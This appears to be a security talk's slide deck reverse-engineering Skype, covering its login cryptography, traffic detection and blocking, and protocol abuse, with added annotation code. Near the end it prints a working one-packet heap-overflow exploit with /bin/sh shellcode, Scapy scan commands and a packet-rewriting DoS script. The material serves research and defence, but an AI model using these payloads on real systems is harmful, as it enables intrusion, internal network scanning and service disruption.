    <IP version=4L ihl=5L tos=0x0 len=110 id=56312 flags= frag=0L ttl=107 proto=UDP chksum=0xe229 src=67.172.146.158 dst=172.16.15.2 options='' |<UDP sport=4344 dport=31337 len=90 chksum=0x485d |<Skype_SoF id=0x3c66 func=0x2 |<Skype_Enc iv=0x31EB8C94L crc32=0x75012AAFL crypted='"\xf5\x01~\xd1\xb0(\xa8\x03\xd1\xd9\x8d6\x97\xd6\x9e\xc0\x04<\x99\xf0\x0c\x14\x1d\xd6`\xe2\xdc\xc0\xc3\x8d\xb4B\xa4\x9f\xd5\xbcK\x96\xccB\xaa\x17eBt8EA.[remaining bytes lost in extraction]' |<Skype_Cmd cmdlen=69L is_b0=1L is_req=1L is_b2=0L cmd=8L reqid=45233 val=<Skype_Encod encod=0x42 |<Skype_Compressed val=[[0, 201L], [5, 9L], nine entries of the form [2, <Skype_INET ip=... port=... |>] (IP octets scrambled in extraction; ports 28072, 48184, 43794, 1528, 29669, 57709, 62083, 33208, 40793), [2, None]] |>> |>>>>>

Outline (slide 62/98): section 4, Advanced/diverted Skype functions: Analysis of the login phase.

Slide 63/98: Trusted data

Embedded trusted data: in order to recognize the Skype authority, the binary has 13 moduli.
Moduli: two 4096-bit moduli, nine 2048-bit moduli, three 1536-bit moduli.
RSA moduli example: 0xba7463f3...c4aa7b63, 0xc095de9e...73df2ea7

Slide 64/98: Finding friends

Embedded data: for the very first connection, IP/PORT are stored in the binary (next to the moduli).

    push    offset "*Lib/Connection/LoginServers"
    push    45h
    push    offset "80.160.91.5:33033 212.72.49.141:33033 [rest of the string lost in extraction]"
    mov     ecx, eax
    call    sub_98A360

Some login server IP/PORT and supernode IP/PORT: a list of IP:33033 pairs whose addresses were scrambled in extraction (recoverable prefixes: 80.160.91., 212.72.49., 64.246.48., 66.235.181.).

Slide 65/98: Phase 0: Hypothesis

Trusted data:
- Each message signed by one of the Skype moduli is trusted
- The client and the login server have a shared secret: a hash of the password

Slide 66/98: Phase 1: Key generation

Session parameters: when a client logs in,
- Skype will generate two 512-bit primes
- This will give a 1024-bit RSA private/public key pair
- Those keys represent the user for the duration of his connection
- The client generates a symmetric session key K

Slide 67/98: Phase 2: Authentication

Key exchange:
- The client hashes its login, "\nskyper\n" and password with MD5
- The client ciphers its public modulus and the resulting hash with K
- The client encrypts K using RSA with one of the trusted Skype moduli
- It sends the encrypted session key K and the ciphered data to the login server

Slide 68/98: Phase 2: Authentication (diagram)

Figure: boxes on the slide are Skype modulus, Rand 192 bits, Login \nskyper\n Password, RSA 1536 bits, Session key, MD5, Hash (SHA160 based), User modulus, Shared secret, 256 bits key, Cipher (AES 256 based), Encrypted session key, Encrypted shared secret. The arrows were lost in extraction; read with the previous slide, the random value is the session key, RSA-1536 under the Skype modulus produces the encrypted session key, MD5 of login, "\nskyper\n" and password produces the shared secret, and the SHA-1-based hash of the session key gives the 256-bit key under which the user modulus and the shared secret are ciphered.
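The exchange of phases 1 and 2 with both sides, as an added example and not Skype's or the authors' code. The primitives are stand-ins chosen so the block runs with the standard library alone: a toy 256-bit RSA in place of RSA-1536 and the 1024-bit user key, a SHA-1 expansion in place of the "SHA160 based" key derivation, and a SHA-256 counter-mode keystream in place of the "AES 256 based" cipher. The slides do not say how the login name reaches the server, so here it is carried inside the ciphered blob; that, the 32-byte field widths and the candidate passwords are assumptions.

```python
import hashlib
import hmac
import os
import random


def _probable_prime(n, rounds=20):
    """Miller-Rabin; fine for a toy modulus (random is not a CSPRNG)."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits):
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _probable_prime(cand):
            return cand


def rsa_keygen(bits=256):
    """Toy RSA from two primes of bits/2 each (the slide's user key uses two
    512-bit primes; the size is reduced here for speed)."""
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return (p * q, e), (p * q, pow(e, -1, phi))


def derive_cipher_key(session_key):
    """Stand-in for the 'Hash (SHA160 based)' box: 192-bit K -> 256-bit key."""
    return (hashlib.sha1(session_key).digest() +
            hashlib.sha1(session_key + b"\x01").digest())[:32]


def stream_xor(key, data):
    """Stand-in for the 'Cipher (AES 256 based)' box: SHA-256 in counter mode."""
    ks = b"".join(hashlib.sha256(key + i.to_bytes(4, "big")).digest()
                  for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, ks))


def password_hash(login, password):
    """Phase 2: MD5 over login, '\\nskyper\\n', password.  This is the Phase 0
    shared secret, so the login server's database stores exactly this value."""
    return hashlib.md5(f"{login}\nskyper\n{password}".encode()).digest()


def client_login(login, password, skype_pub):
    """Client side.  Returns the message for the login server and the
    per-session user private key."""
    user_pub, user_priv = rsa_keygen()          # Phase 1: per-session user key pair
    session_key = os.urandom(24)                # Phase 1: symmetric K, 192 bits
    n, e = skype_pub                            # one of the trusted Skype moduli
    enc_key = pow(int.from_bytes(session_key, "big"), e, n)
    blob = (login.encode().ljust(32, b"\x00") +           # assumption: login in the blob
            user_pub[0].to_bytes(32, "big") +             # user public modulus
            password_hash(login, password))               # 16-byte shared secret
    message = {"enc_session_key": enc_key,
               "enc_data": stream_xor(derive_cipher_key(session_key), blob)}
    return message, user_priv


def login_server(message, skype_priv, hash_db):
    """Login server side.  hash_db maps login -> stored password hash.
    Returns (accepted, user_modulus)."""
    n, d = skype_priv
    session_key = pow(message["enc_session_key"], d, n).to_bytes(24, "big")
    blob = stream_xor(derive_cipher_key(session_key), message["enc_data"])
    login = blob[:32].rstrip(b"\x00").decode(errors="replace")
    user_modulus = int.from_bytes(blob[32:64], "big")
    if not hmac.compare_digest(hash_db.get(login, b""), blob[64:]):
        return False, None
    return True, user_modulus
```

Whoever holds the private half of a trusted Skype modulus, or operates the login server, sees the session key and therefore the shared secret; the "big database to store users' passwords" of a home-made login server is a database of exactly these MD5 values.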

Slide 69/98: Phase 3: Running

Session behavior: if the hash of the password matches, the login associated with the public key is dispatched to the supernodes. This information is signed by the Skype server. Note that private information is signed by each user.
Search for buddy: if you search for a login name, a supernode will send back this couple. You receive the public key of the desired buddy. The whole packet is signed by a Skype modulus.

Slide 70/98: Phase 4: Communicating

Inter-client session:
- Both clients' public keys are exchanged
- Those keys are signed by the Skype authority
- Each client sends an 8-byte challenge to sign
- Clients are then authenticated and can choose a session key

Outline (slide 71/98): section 4, Advanced/diverted Skype functions: Playing with Skype Traffic.

Slide 72/98: Detecting Skype traffic

Some ideas to detect Skype traffic without deobfuscation:
- Most of the traffic is crypted... but not all
- UDP communications imply clear traffic to learn the public IP
- TCP communications use the same RC4 stream twice!

Slide 73/98: Detecting Skype traffic: TCP traffic

- TCP streams begin with a 14-byte payload
- From it we can recover 10 bytes of RC4 stream
- The RC4 stream is used twice, and we know 10 of the first 14 bytes

Figure: from one seed come crypted stream 1 and crypted stream 2; crypted stream 1 XOR known cleartext yields the RC4 stream (10 bytes), and that RC4 stream XOR crypted stream 2 yields recovered Skype traffic.
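The keystream-reuse step of the figure above, as an added example with constructed data (not the authors' code and not Skype's framing): two 14-byte first payloads are enciphered under one RC4 keystream, 10 cleartext bytes of the first are taken as known, the keystream is recovered at those offsets and applied to the second payload. The RC4 KSA/PRGA is the standard algorithm; the key, the sample payloads and the choice of offsets 4..13 as the predictable bytes are assumptions, since the slide does not say which 10 of the 14 bytes are known.

```python
KNOWN_OFFSETS = range(4, 14)   # assumption: the 10 predictable header bytes


def rc4_keystream(key, n):
    """Standard RC4 key scheduling + PRGA, returning n keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def make_sample_streams():
    """Constructed: two 14-byte first payloads under the same keystream."""
    ks = rc4_keystream(b"constructed-sample-key", 14)
    header_known = bytes(range(0x10, 0x1a))                     # 10 predictable bytes
    stream1_clear = bytes.fromhex("a1b2c3d4") + header_known    # 4 unknown + 10 known
    stream2_clear = bytes.fromhex("deadbeef") + b"SKYPE-PKT!"   # what we want back
    return xor_bytes(stream1_clear, ks), xor_bytes(stream2_clear, ks), header_known


def recover_keystream(crypted_stream1, header_known):
    """Ciphertext XOR known cleartext gives the keystream at the known offsets."""
    base = KNOWN_OFFSETS[0]
    return {off: crypted_stream1[off] ^ header_known[off - base] for off in KNOWN_OFFSETS}


def decrypt_with_recovered(crypted_stream2, keystream_part):
    """Apply the recovered keystream bytes to the other stream's first bytes."""
    return bytes(crypted_stream2[off] ^ keystream_part[off] for off in sorted(keystream_part))


if __name__ == "__main__":
    c1, c2, known = make_sample_streams()
    print(decrypt_with_recovered(c2, recover_keystream(c1, known)))   # b'SKYPE-PKT!'
```

The detection value is that the recovered bytes of stream 2 are structured Skype data rather than noise: a monitor that knows the 10 predictable bytes can check, per TCP connection and without any key, whether the first payloads of the two directions decrypt to something consistent.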

Slide 74/98: Detecting Skype traffic: UDP traffic

Skype NAck packet characteristics:
- 28+11 = 39-byte-long packet
- Function & 0x8f = 7
- Bytes 31-34 are (one of) the public IP of the network

Figure (hex dump with field labels):
    7f 4e 77                   Skype_SoF: id=0x7f4e func=0x77
    52 7c 48 33 83 b0 86 56    Skype_NAck: src=82.124.72.51 dst=131.176.134.86

Slide 75/98: Detecting Skype traffic: blocking UDP traffic

On the use of NAck packets:
- The very first UDP packet received by a Skype client will be a NAck
- This packet is not crypted
- This packet is used to set up the obfuscation layer
- Skype can't communicate on UDP without receiving this one

How to block Skype UDP traffic with one rule...

    iptables -I FORWARD -p udp -m length --length 39 -m u32 \
        --u32 '27&0x8f=7' --u32 '31=0x527c4833' -j DROP
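A parser for the clear Skype UDP framing shown on the hex dumps (slide 59's Resend and slide 74's NAck) together with a Python equivalent of the iptables rule above, useful for checking what the rule matches on a capture before deploying it. This is an added example, not Skypy or Scapy code. The field order (Resend: adet, dst, src, crc, reencrypted; NAck: src, dst) is read off the labelled dumps; the mapping of func & 0x8f to a layer (2 Enc, 3 Resend, 7 NAck) is inferred from the func values shown on these slides and is an assumption beyond the NAck case the slide states; the IP/UDP framing of the sample packets is constructed, with zero checksums and made-up ports.

```python
import ipaddress
import struct


def parse_sof(payload):
    """Skype_SoF is a 2-byte id and a 1-byte func; the body depends on func & 0x8f."""
    if len(payload) < 3:
        raise ValueError("too short for Skype_SoF")
    pkt_id, func = struct.unpack("!HB", payload[:3])
    # 2/3/7 inferred from the func values on the slides (assumption beyond NAck)
    kind = {2: "Enc", 3: "Resend", 7: "NAck"}.get(func & 0x8f, "unknown")
    body = payload[3:]
    out = {"id": pkt_id, "func": func, "kind": kind}
    if kind == "NAck" and len(body) >= 8:
        out["src"] = str(ipaddress.IPv4Address(body[0:4]))
        out["dst"] = str(ipaddress.IPv4Address(body[4:8]))
    elif kind == "Resend" and len(body) >= 13:
        out["adet"] = body[0]
        out["dst"] = str(ipaddress.IPv4Address(body[1:5]))
        out["src"] = str(ipaddress.IPv4Address(body[5:9]))
        out["crc"] = struct.unpack("!I", body[9:13])[0]
        out["reencrypted"] = body[13:]
    return out


def build_udp_packet(src, dst, sport, dport, payload):
    """Minimal IPv4 + UDP framing for the samples (checksums left at zero)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0x4000,
                         64, 17, 0, ipaddress.IPv4Address(src).packed,
                         ipaddress.IPv4Address(dst).packed)
    udp_hdr = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    return ip_hdr + udp_hdr + payload


def udp_payload(ip_packet):
    ihl = (ip_packet[0] & 0x0f) * 4
    return ip_packet[ihl + 8:]


def matches_nack_rule(ip_packet, public_ip):
    """Same test as the iptables rule:
    -m length --length 39 -m u32 --u32 '27&0x8f=7' --u32 '31=<public IP>'.
    u32 loads 4 bytes big-endian at the offset, so '27&0x8f=7' tests byte 30
    (20 IP + 8 UDP header bytes, then id, id, func: the SoF func byte) and
    '31=...' compares bytes 31..34, the NAck src field."""
    if len(ip_packet) != 39:
        return False
    word27 = struct.unpack("!I", ip_packet[27:31])[0]
    word31 = struct.unpack("!I", ip_packet[31:35])[0]
    return word27 & 0x8f == 7 and word31 == int(ipaddress.IPv4Address(public_ip))


# Payload bytes copied from the slides' hex dumps.
NACK_PAYLOAD = bytes.fromhex("7f4e77" "527c4833" "83b08656")            # slide 74
RESEND_PAYLOAD = bytes.fromhex("7f4863" "01" "83b08656" "82a12c75"
                               "f102f088" "fe65132ce197ac")             # slide 59

if __name__ == "__main__":
    pkt = build_udp_packet("82.124.72.51", "131.176.134.86", 8275, 2051, NACK_PAYLOAD)
    print(parse_sof(udp_payload(pkt)), matches_nack_rule(pkt, "82.124.72.51"))
    print(parse_sof(RESEND_PAYLOAD))
```

The rule is bound to one public address (0x527c4833 is 82.124.72.51); a network with several egress addresses needs one rule per address, and a Resend packet, being longer than 39 bytes, never matches even though it is equally unencrypted.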

Slide 76/98: Blocking Skype

- Skype can't work without a TCP connection
- But Skype can work without UDP
=⇒ Blocking UDP is not sufficient

Slide 77/98: Blocking Skype

- We did not find any command to shut down Skype
- But if we had a subtle DoS to crash the communication manager...
=⇒ ...we could detect and replace every NAck by a packet triggering this DoS

Slide 78/98: How to make Skype deaf and dumb

    iptables -I FORWARD -p udp -m length --length 39 -m u32 \
        --u32 '27&0x8f=7' --u32 '31=0x01020304' -j QUEUE

    from ipqueue import *
    from struct import pack, unpack
    q = IPQ(IPQ_COPY_PACKET)
    while 1:
        p = q.read()
        pkt = p[PAYLOAD]
        ihl = (ord(pkt[0]) & 0xf) << 2
        c = crc32(2**32-1, pkt[15:11:-1] + "\x00"*8)
        x, y, iplen, ipchk = unpack("!2sH6sH", pkt[:12])
        iplen += 4; ipchk -= 4
        newpkt = pack("!2sH6sH", x, y, iplen, ipchk) + pkt[12:ihl+4] \
                 + pack("!HxII", 23, 2, c) + "sorry, censored until fixed"
        q.set_verdict(p[PACKET_ID], NF_ACCEPT, newpkt)

(Python 2 script using the ipqueue module; the replacement payload is censored on the slide.)

Slide 79/98: How to generate traffic without the seed-to-RC4-key engine

- Get the RC4 key for a given seed once
- Always use this key to encrypt
- Calculate the CRC stuff
- Use IV = seed ⊕ crc

Figure: Source IP, Destination IP, ID and \x00\x00 feed CRC32; the CRC combined with the packet IV gives the seed, which the seed-to-RC4-key engine turns into the 80-byte RC4 key.

Outline (slide 80/98): section 4, Advanced/diverted Skype functions: Nice commands.

Slide 81/98: Firewall testing (a.k.a. remote scan)

Let's TCP ping Slashdot:
    >>> send(IP(src="1.2.3.4",dst="172.16.72.19")/UDP(sport=1234,dport=1146)/Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41, is_b0=1, is_req=0, val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1)/Skype_Obj_INET(id=0x11, ip="slashdot.org", port=80)))

A TCP connect scan from the inside:
    >>> send(IP(src="1.2.3.4",dst="172.16.72.19")/UDP(sport=1234,dport=1146)/Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41, is_b0=1, is_req=0, val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1)/Skype_Obj_INET(id=0x11, ip="172.16.72.*", port=(0,1024))))

A look for MS SQL from the inside:
    >>> send(IP(src="1.2.3.4",dst="172.16.72.19")/UDP(sport=1234,dport=1146)/Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=41, is_b0=1, is_req=0, val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=1)/Skype_Obj_INET(id=0x11, ip="172.16.72.131", port=1433)))

Slide 82/98: Firewall testing (a.k.a. remote scan)

    Me: Say hello to slashdot.org:80
    IP 1.2.3.4.1234 > 172.16.72.19.1146: UDP, length: 24
    Skype: Yes, master
    IP 172.16.72.19.1146 > 1.2.3.4.1234: UDP, length: 11
    Skype: Hello! (in UDP)
    IP 172.16.72.19.1146 > 66.35.250.151.80: UDP, length: 20
    Skype: connecting to slashdot in TCP
    IP 172.16.72.19.3776 > 66.35.250.151.80: S 0:0(0)
    IP 66.35.250.151.80 > 172.16.72.19.3776: S 0:1(0) ack 0
    IP 172.16.72.19.3776 > 66.35.250.151.80: . ack 1
    Skype: Hello! (in TCP). Do you speak Skype ?
    IP 172.16.72.19.3776 > 66.35.250.151.80: P 1:15(14) ack 1
    IP 66.35.250.151.80 > 172.16.72.19.3776: . ack 15
    Skype: Mmmh, no. Goodbye.
    IP 172.16.72.19.3776 > 66.35.250.151.80: F 15:15(0) ack 1
    IP 66.35.250.151.80 > 172.16.72.19.3776: F 1:1(0) ack 16

Slide 83/98: Skype network

Supernodes:
- Each Skype client can relay communications to help the unfortunate ones behind a firewall
- When a Skype client has a good score (bandwidth + no firewall + good CPU) it can be promoted to supernode

Slots and blocks:
- Supernodes are grouped by slots
- You usually find 9 or 10 supernodes per slot
- You have 8 slots per block

Slide 84/98: Who are the supernodes?

Just ask: each supernode knows almost all other supernodes. This command actually asks for at most 100 supernodes from slot 201:

    >>> sr1(IP(dst="67.172.146.158")/UDP(sport=31337,dport=4344)/Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=6, reqid=RandShort(), val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=2)/Skype_Obj_Num(id=0,val=201)/Skype_Obj_Num(id=5,val=100)))

Nowadays there are ∼2050 slots; that means ∼20k supernodes in the world.

Slide 85/98: Where are the supernodes? (figure: map of supernode locations; not recoverable from the extraction)

Parallel world: build your own Skype Private Network

Skype is linked to the network because it contains:
- hard-coded RSA keys
- Skype servers' IP/PORT
- Skype supernodes' IP/PORT

Make your own network?
- Generate your own 13 moduli
- Build a login server with a big database to store users' passwords
- And burn a new binary!

Job's done. You are the head of a new world wide P2P network.

Dark network is not enough

Dr Evil, your network is not wide enough!
- The use of relay manager is not authenticated
- Your supernode can request official network relay managers... and feed your own nodes with them

[diagram: Skype network / Stolen relay manager / Dr Evil network]

Skype Voice Interception: feasibility of a man in the middle attack

You are Skype Inc:
- You are the certificate authority
- You can intercept and decrypt session keys
- Job's done.

You are not Skype Inc:
- Build your own Skype Private Network
- Lure your victim into using your modified Skype version
- You can intercept and decrypt session keys
- Job's done.

Heap overflow: Algorithm

  lea   ecx, [esp+arg_4]
  push  ecx
  call  get_uint          ; (1)
  add   esp, 0Ch
  test  al, al
  jz    parse_end
  mov   edx, [esp+arg_4]  ; (2)
  lea   eax, ds:0[edx*4]  ; (3)
  push  eax
  mov   [esi+10h], eax
  call  LocalAlloc
  mov   ecx, [esp+arg_4]
  mov   [esi+0Ch], eax

(1) Read an unsigned int NUM from the packet
(2) This integer is the number of unsigned ints to read next
(3) malloc 4*NUM for storing those data

Heap overflow: Algorithm (continued)

  read_int_loop:
  push  ebx
  push  edi
  push  ebp
  call  get_uint          ; (1)
  add   esp, 0Ch
  test  al, al
  jz    parse_end
  mov   eax, [esp+arg_4]
  inc   esi
  add   ebp, 4            ; (2)
  cmp   esi, eax
  jb    read_int_loop

(1) For each NUM we read an unsigned int
(2) And we store it in the array freshly allocated

Heap overflow: How to exploit that?

If NUM = 0x80000010, the multiplication by 4 will overflow:
  0x80000010 × 4 = 0x00000040
So Skype will allocate 0x00000040 bytes, but it will read NUM integers
=> Skype will overflow the heap
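The size arithmetic above, as an added example that is not from the slides: a C program that computes the allocation size the way the disassembled code does (32-bit NUM*4, which wraps to 0x40 for NUM = 0x80000010) next to a hardened size check that rejects a NUM whose product would wrap, or that announces more integers than the packet still carries. The packet layout (little-endian uint32s), the get_uint/put_uint helpers, parse_array_checked and the two demo packets are assumptions made for this demo; only the 4*NUM computation and the 0x80000010 value come from the slides.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Little-endian uint32 reader over a bounded buffer (assumed encoding for the demo). */
static int get_uint(const uint8_t *buf, size_t len, size_t *off, uint32_t *out)
{
    if (*off > len || len - *off < 4)
        return 0;                                  /* truncated packet */
    const uint8_t *p = buf + *off;
    *out = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
    *off += 4;
    return 1;
}

/* Serialise one uint32 little-endian (used to build the constructed packets). */
static void put_uint(uint8_t *buf, size_t *off, uint32_t v)
{
    buf[*off] = v & 0xff;          buf[*off + 1] = (v >> 8) & 0xff;
    buf[*off + 2] = (v >> 16) & 0xff; buf[*off + 3] = (v >> 24) & 0xff;
    *off += 4;
}

/* Size the disassembled code hands to LocalAlloc: lea eax, [edx*4] on a
 * 32-bit register, so the product silently wraps modulo 2^32. */
uint32_t unsafe_alloc_size(uint32_t num)
{
    return num * 4u;                               /* 0x80000010 * 4 == 0x40 */
}

/* Hardened size computation. Returns the byte size, or 0 when the object
 * must be rejected: 4*NUM would wrap, or NUM exceeds the ints left in the packet. */
size_t checked_size_or_zero(uint32_t num, size_t remaining)
{
    if (num > UINT32_MAX / 4u)
        return 0;                                  /* 4*NUM would overflow */
    if ((size_t)num * 4u > remaining)
        return 0;                                  /* more ints announced than sent */
    return (size_t)num * 4u;
}

/* Parse one array object (NUM, then NUM uint32 values) safely.
 * Returns the number of ints read and leaves them in *vals (caller frees),
 * or -1 if the object is rejected. */
long parse_array_checked(const uint8_t *pkt, size_t len, uint32_t **vals)
{
    size_t off = 0;
    uint32_t num;
    *vals = NULL;
    if (!get_uint(pkt, len, &off, &num))
        return -1;
    size_t size = checked_size_or_zero(num, len - off);
    if (num != 0 && size == 0)
        return -1;                                 /* rejected before any allocation */
    uint32_t *arr = malloc(size ? size : 1);
    if (!arr)
        return -1;
    for (uint32_t i = 0; i < num; i++) {           /* bounded by both NUM and len */
        if (!get_uint(pkt, len, &off, &arr[i])) {
            free(arr);
            return -1;
        }
    }
    *vals = arr;
    return (long)num;
}

/* Constructed well-formed object: NUM = 3 followed by three values. */
long demo_parse_good(void)
{
    uint8_t pkt[16];
    size_t off = 0;
    put_uint(pkt, &off, 3);
    put_uint(pkt, &off, 0x11111111u);
    put_uint(pkt, &off, 0x22222222u);
    put_uint(pkt, &off, 0xdeadbeefu);
    uint32_t *vals;
    long n = parse_array_checked(pkt, off, &vals);
    if (n == 3 && vals[2] != 0xdeadbeefu)
        n = -2;                                    /* values must round-trip */
    free(vals);
    return n;
}

/* Constructed malicious object: NUM = 0x80000010 (the value from the slides)
 * with nothing behind it. Unchecked code allocates 0x40 bytes and loops
 * 0x80000010 times; the checked parser refuses the object up front. */
long demo_parse_malicious(void)
{
    uint8_t pkt[4];
    size_t off = 0;
    put_uint(pkt, &off, 0x80000010u);
    uint32_t *vals;
    long n = parse_array_checked(pkt, off, &vals);
    free(vals);
    return n;
}

int main(void)
{
    printf("unchecked size for NUM=0x80000010: 0x%x bytes\n", (unsigned)unsafe_alloc_size(0x80000010u));
    printf("good packet parsed: %ld ints\n", demo_parse_good());
    printf("malicious packet parsed: %ld (rejected)\n", demo_parse_malicious());
    return 0;
}
```

The second check in checked_size_or_zero matters as much as the first: even without a wrapping product, a count that is only bounded by the attacker's NUM lets the read loop run past the data actually received, so the count is capped by the bytes remaining in the packet before anything is allocated.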

Heap overflow: Good exploit

In theory, exploiting a heap on Windows XP SP2 is not very stable.
But Skype has some object oriented parts: it has some structures with function pointers in the heap.
If the allocation of the heap is close to this structure, the overflow can smash function pointers,
and those functions are often called.
=> Even on XP SP2, the exploit is possible :-)

Heap overflow: Design of the exploits

- We need the array object to be decoded
- It only needs to be present in the object list to be decoded
- We can use a string object in the same packet to store the shellcode
- String objects are stored in a static place (almost too easy)

Heap overflow: The exploit, 1 UDP packet that comes from nowhere

  >>> send(IP(src="1.2.3.4",dst="172.16.13.37")/UDP(sport=1234,dport=31337)
       /Skype_SoF(id=RandShort())/Skype_Enc()/Skype_Cmd(cmd=14,reqid=RandShort(),
       val=Skype_Encod(encod=0x41)/Skype_Objects_Set(objnb=2)/Skype_Obj_Str(
       val="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0a\x90\x90\x90\x90
       \x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89
       \x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d
       \x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
       \x00"))/Skype_Hdr(type=6)/Raw(vblen_encode("\x10\x00\x00\x40AAAAAAAAAAA
       AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\x80\x80\x80
       \xfc\xff\xff\xff\xa4\xb0\x67\x08\xfc\xd3\x67\x08")))



Heap overflow: a.k.a. the biggest botnet ever...

Conclusion

Good points
- Skype was made by clever people
- Good use of cryptography

Bad points
- Hard to enforce a security policy with Skype
- Jams traffic, can't be distinguished from data exfiltration
- Incompatible with traffic monitoring, IDS
- Impossible to protect from attacks (which would be obfuscated)
- Total blackbox, lack of transparency
- No way to know if there is/will be a backdoor
- Fully trusts anyone who speaks Skype

Ho, I almost forgot...

Caution: Never ever type /eggy prayer or /eggy indrek@mare.ee
Those men who tried aren't here to speak about what they saw...

References

- Neale Pickett, Python ipqueue, http://woozle.org/~neale/src/ipqueue/
- F. Desclaux, RR0D: the Rasta Ring 0 Debugger, http://rr0d.droids-corp.org/
- P. Biondi, Scapy, http://www.secdev.org/projects/scapy/
- P. Biondi, Shellforge, http://www.secdev.org/projects/shellforge/
- P. Biondi, PytStop, http://www.secdev.org/projects/pytstop/
- P. Biondi, Siringe, http://www.secdev.org/c/siringe.c
